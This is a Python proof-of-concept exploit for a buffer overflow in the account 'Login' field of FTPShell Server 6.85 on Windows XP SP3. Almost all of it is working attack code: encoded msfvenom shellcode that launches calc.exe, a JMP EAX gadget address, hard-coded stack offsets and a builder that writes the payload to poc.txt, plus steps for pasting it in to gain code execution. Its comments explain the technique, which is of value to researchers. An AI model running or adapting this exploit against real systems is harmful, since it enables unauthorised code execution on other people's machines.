#!/usr/bin/python  
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow  
# Date: December 2nd, 2019  
# Exploit Author: boku  
# Vendor Homepage: http://www.ftpshell.com/index.htm  
# Software Link: http://www.ftpshell.com/downloadserver.htm
# Program Name: FTPShell Server (Secure Plus edition)  
# Version: Version 6.85  
# Tested on: Windows XP Professional (32-bit) - 5.1.2600 Service Pack 3 Build 2600
# Recreate:  
# - Install FTPShell Server v6.85  
# - open 'FTPShell Server Administrator'  
# - Click button 'Manage FTP Accounts..'  
# - Click button 'Configure accounts..'   
# - Click button 'Add'  
# - Run python script & transfer 'poc.txt' to windows box  
# - Open 'poc.txt' & select-all, then copy   
# - Paste poc.txt text blob into 'Login' text-box  
# - Press button 'OK'; program will crash & shellcode will execute  
  
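blt = '\033[92m[\033[0m+\033[92m]\033[0m '  # green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m '  # red fail bullet

# Instructions at the crash (reached via the 'Recreate' steps in the header):
#   1. mov ecx,[esi+7c0]
#   2. mov eax,[ecx]; lea edx,[ebp-4]; push edx
#   3. call [eax+2c4]
#
# Layout of the blob written to poc.txt (offsets from its first byte):
#   [0    : 708)   shellcode, NOP-padded              <- EAX ends up pointing here
#   [708  : 712)   address of a JMP EAX gadget        <- read by call [eax+2c4]
#   [712  : 1568)  NOP filler
#   [1568 : 1571)  low 3 bytes of the value ECX gets; the 4th byte (0x00) is
#                  the NUL terminator the program appends when 'OK' is pressed.
#
# Because the Login field is handled as a C string, no byte of the blob may be
# 0x00 -- hence msfvenom's -b '\x00' and the explicit check in build_payload().
#
# msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python
# x86/shikata_ga_nai chosen with final size 220
shellcode = b""
shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4"
shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc"
shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46"
shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e"
shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4"
shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9"
shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4"
shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69"
shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda"
shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61"
shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43"
shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43"
shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c"
shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80"
shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85"
shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e"
shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6"
shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0"
shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98"
shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b"

# call [eax+2c4]: 0x2c4 == 708, so the gadget pointer sits 708 bytes past EAX,
# which leaves exactly 708 bytes for the shellcode.
SHELLCODE_ROOM = 0x2c4
# mov ecx,[esi+7c0]: ESI = 0x0012C108 at the crash and esi+7c0 lands inside our
# buffer on the stack, 1568 bytes into the blob -- that is where ECX is read from.
ECX_OFFSET = 1568
# 0x7c9ef4c9 jmp eax | shell32.dll (Execute&Read); aslr&rebase: false.
# NOTE: this address is specific to the tested Windows XP SP3 32-bit build; any
# other shell32.dll build moves the gadget and the PoC will only crash the target.
JMP_EAX = b'\xc9\xf4\x9e\x7c'
# mov eax,[ecx]: ECX = 0x0012B768, a stack pointer to the start of our blob, so
# EAX becomes the address of the shellcode.  Only the low 3 bytes are supplied
# here; the program's own NUL terminator provides the 0x00 high byte.  Like the
# gadget, this stack address was observed on the tested machine only.
ECX_BYTES = b'\x68\xb7\x12'


def build_payload(shellcode=shellcode, jmp_eax=JMP_EAX, ecx_bytes=ECX_BYTES):
    """Return the byte blob to paste into the 'Login' field.

    Args:
        shellcode: NUL-free x86 shellcode, at most SHELLCODE_ROOM (708) bytes.
        jmp_eax:   4-byte little-endian address of a JMP EAX gadget.
        ecx_bytes: the 3 low bytes of the stack address the blob starts at.

    Returns:
        bytes of length ECX_OFFSET + len(ecx_bytes) (1571 with the defaults).

    Raises:
        ValueError: if the shellcode does not fit, the head of the blob would
            overrun ECX_OFFSET, or the blob contains a NUL byte (which would
            truncate the C string the program copies).
    """
    if len(shellcode) > SHELLCODE_ROOM:
        raise ValueError('shellcode is %d bytes, only %d fit before the gadget pointer'
                         % (len(shellcode), SHELLCODE_ROOM))
    # NOP-pad the shellcode so the gadget pointer lands exactly at EAX+0x2c4.
    head = shellcode + b'\x90' * (SHELLCODE_ROOM - len(shellcode)) + jmp_eax
    if len(head) > ECX_OFFSET:
        raise ValueError('shellcode+gadget (%d bytes) overrun the ECX offset %d'
                         % (len(head), ECX_OFFSET))
    # Fill up to the point esi+7c0 is read from, then supply the ECX value.
    payload = head + b'\x90' * (ECX_OFFSET - len(head)) + ecx_bytes
    if b'\x00' in payload:
        raise ValueError('payload contains a NUL byte; the Login field is a C string '
                         'and would be truncated there')
    return payload


def main():
    """Write the payload to poc.txt in the current directory and report the result."""
    try:
        # Binary mode: the blob is raw bytes, and text mode would both refuse
        # bytes on Python 3 and translate line endings on Windows.
        with open('poc.txt', 'wb') as f:
            f.write(build_payload())
    except (IOError, OSError, ValueError) as exc:
        # Report the reason instead of swallowing it like a bare except would.
        print(err + 'poc.txt failed to create: %s' % exc)
        return
    print(blt + 'poc.txt created successfully')


if __name__ == '__main__':
    main()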